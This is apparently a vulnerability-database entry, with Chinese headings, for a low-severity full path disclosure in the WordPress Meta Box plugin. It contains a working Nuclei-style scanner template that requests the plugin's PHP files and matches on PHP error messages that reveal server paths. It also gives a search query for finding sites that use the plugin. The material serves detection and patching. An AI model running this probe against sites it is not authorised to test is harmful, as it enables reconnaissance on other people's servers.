漏洞描述
The Meta Box – WordPress Custom Fields Framework plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path.
wordpress-meta-box-fpd: WordPress Meta Box - Full Path Disclosure
PoC代码[已公开]
id: wordpress-meta-box-fpd
info:
name: WordPress Meta Box - Full Path Disclosure
author: pussycat0x
severity: low
description: |
The Meta Box – WordPress Custom Fields Framework plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path.
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
publicwww-query: "/wp-content/plugins/meta-box/"
tags: wordpress,wp-plugin,fpd,disclosure,meta-box
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/meta-box/meta-box.php"
- "{{BaseURL}}/wp-content/plugins/meta-box/inc/loader.php"
- "{{BaseURL}}/wp-content/plugins/meta-box/inc/core.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "wp-content/plugins/meta-box")'
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 4a0a00473045022016971f57190e2b081b3c68782576d0c9995f0832f258165c7d973f5eea44513e022100e5e81634e1ac2964143c5e1f0bfe0c6fe4f419eb8d4f890eb928d0d54ab26380:922c64590222798bb761d5b6d8e72950